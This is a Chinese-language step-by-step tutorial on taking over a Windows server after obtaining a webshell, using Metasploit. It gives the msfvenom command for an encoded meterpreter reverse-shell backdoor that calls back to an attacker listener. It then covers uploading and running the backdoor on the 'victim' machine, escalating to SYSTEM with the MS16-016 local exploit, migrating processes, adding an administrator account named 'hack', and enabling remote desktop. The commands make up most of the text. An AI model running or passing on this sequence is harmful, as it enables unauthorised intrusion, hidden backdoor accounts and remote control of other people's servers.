滲透之——MSF提權
在WEB滲透中當我們拿到webshell了,我們可以試試用MSF(metasploit)來進行提權,在MSF裡meterpreter很強大的!
我們先用msfvenom生成一個EXE的木馬後門。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe
然後在到MSF根據剛才配置的木馬後門進行監聽...
然後在把木馬上傳到伺服器(受害者)的機器裡,必須上傳到可讀可寫的目錄下
比如這裡我吧abc.exe上傳到了C:\users\leak\desktop\目錄下,
abc.exe就是我剛才生成的後門。
然後在執行我們的後門,可以看見MSF彈回了一個session 1(會話連線)。
說明我們後門程式成功執行起來了,當然你也可以在webshell執行的,
但必須的有一點執行的許可權
getuid //可以看見我們的許可權很低的,一般都是user許可權的,
但也遇到過某些伺服器執行後就直接是system最高許可權。像這種我們就直接加使用者啦。
這裡我們是user許可權,我們要把它提升到system許可權。Windows最高許可權
接著我們輸入命令
background //把你當前的metasploit shell轉為後臺執行。
search ms16 // 搜尋關鍵字相關的漏洞
.....然後我選擇了MS16-016這個漏洞在進行提權
use exploit/windows/local/ms16_016_webdav // 選擇漏洞
show options //檢視漏洞裡邊要設定的引數
可以看見只有一個SESSION引數要設定
set SESSION 1 // 設定會剛才我們後門連線的ID號 1
exploit //執行提權...
可以看見成功的吧漏洞利用到了PID為692的程序中...
雖然提權成功了 但你getuid下還是看見的是user許可權
ps一下檢視程序
根據剛才的提示找到PID 692的程序
可以看見確實是system許可權
所以我們還要用到migrate 命令 //遷移到一個指定的程序ID。
migrate 692 //
在getuid下可以看見為system許可權啦
提權成功了
既然有了system許可權 那我們在新增賬號hack
新增為管理員組
用Nmap掃下並沒有開啟遠端登陸3389
run getgui -e //開啟目標主機3389 貌似這條MSF命令只對2003的系統有效 執行幾次都沒成功
所以就用cmd命令開了3389埠
提權成功,登入伺服器。。。